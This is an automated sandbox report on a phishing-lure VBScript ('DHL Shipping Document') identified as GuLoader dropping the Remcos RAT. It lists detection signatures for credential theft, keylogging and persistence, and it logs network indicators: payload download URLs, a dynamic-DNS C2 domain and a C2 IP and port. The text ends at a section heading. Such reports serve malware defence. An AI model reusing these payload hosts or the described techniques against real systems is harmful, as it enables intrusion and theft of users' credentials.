Windows Analysis Report
DHL Shipping Document Awb & BL.vbs

Overview

General Information

Sample name: DHL Shipping Document Awb & BL.vbs
Analysis ID: 1465419
MD5: af8e905368962cfb4873c41a77b4515c
SHA1: 577337de5d106e6b11225be7c362f33a8d5c0831
SHA256: bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3
Tags: vbs
Infos:

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection

Source: Yara match File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:60918 version: TLS 1.2
Source: Binary string: m.Core.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1844677982.0000000002D05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb>b source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 10_2_22B210F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B26580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA, 10_2_22B26580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0040AE51 FindFirstFileW,FindNextFileW, 19_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 21_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 22_2_00407898

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: unknown DNS query: name: janbours92harbu02.duckdns.org
Source: global traffic TCP traffic: 192.168.2.9:60919 -> 206.123.148.194:3981
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View IP Address: 206.123.148.194 206.123.148.194
Source: Joe Sandbox View ASN Name: M247GB M247GB
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /Nedslagnings.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /zPwwF47.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: wab.exe, 00000013.00000003.2021151072.0000000003989000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wab.exe, 00000013.00000003.2021151072.0000000003989000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: bhvB999.tmp.19.dr String found in binary or memory: exp1.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr String found in binary or memory: exp2.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr String found in binary or memory: exp3.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr String found in binary or memory: exp4.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr String found in binary or memory: exp5.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhvB999.tmp.19.dr String found in binary or memory: realtime.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr String found in binary or memory: www.linkedin.com0 equals www.linkedin.com (Linkedin)
Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: contemega.com.do
Source: global traffic DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: janbours92harbu02.duckdns.org
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: bhvB999.tmp.19.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhvB999.tmp.19.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhvB999.tmp.19.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: bhvB999.tmp.19.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000002.00000002.1943692775.000001379AA8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://contemega.com.do
Source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000002.00000002.2065998160.00000137B12D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://microsoft.co
Source: powershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvB999.tmp.19.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: bhvB999.tmp.19.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhvB999.tmp.19.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhvB999.tmp.19.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhvB999.tmp.19.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhvB999.tmp.19.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: wab.exe, wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.coma
Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 00000013.00000002.2021961381.0000000003293000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhvB999.tmp.19.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P
Source: bhvB999.tmp.19.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhvB999.tmp.19.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhvB999.tmp.19.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhvB999.tmp.19.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhvB999.tmp.19.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: bhvB999.tmp.19.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhvB999.tmp.19.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: bhvB999.tmp.19.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/Nedslagnings.dwp
Source: wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/zPwwF47.bin
Source: wab.exe, 0000000A.00000002.2261933839.0000000022470000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/zPwwF47.binOptjsLanmoviesmacktalk.com/zPwwF47.bin
Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: bhvB999.tmp.19.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhvB999.tmp.19.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvB999.tmp.19.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&
Source: bhvB999.tmp.19.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&
Source: bhvB999.tmp.19.dr String found in binary or memory: https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046
Source: bhvB999.tmp.19.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: bhvB999.tmp.19.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhvB999.tmp.19.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhvB999.tmp.19.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wab.exe, 00000013.00000003.2001386225.000000000398B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvB999.tmp.19.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhvB999.tmp.19.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhvB999.tmp.19.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhvB999.tmp.19.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://moviesmacktalk.com/
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dwp
Source: powershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379A562000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dwpX
Source: powershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: bhvB999.tmp.19.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhvB999.tmp.19.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-09-10-14/PreSignInSettingsConfig.json
Source: bhvB999.tmp.19.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=6c2de995c290b031854b
Source: bhvB999.tmp.19.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=eafda5
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhvB999.tmp.19.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhvB999.tmp.19.dr String found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877
Source: bhvB999.tmp.19.dr String found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16
Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvB999.tmp.19.dr String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60918
Source: unknown Network traffic detected: HTTP traffic on port 60918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:60918 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

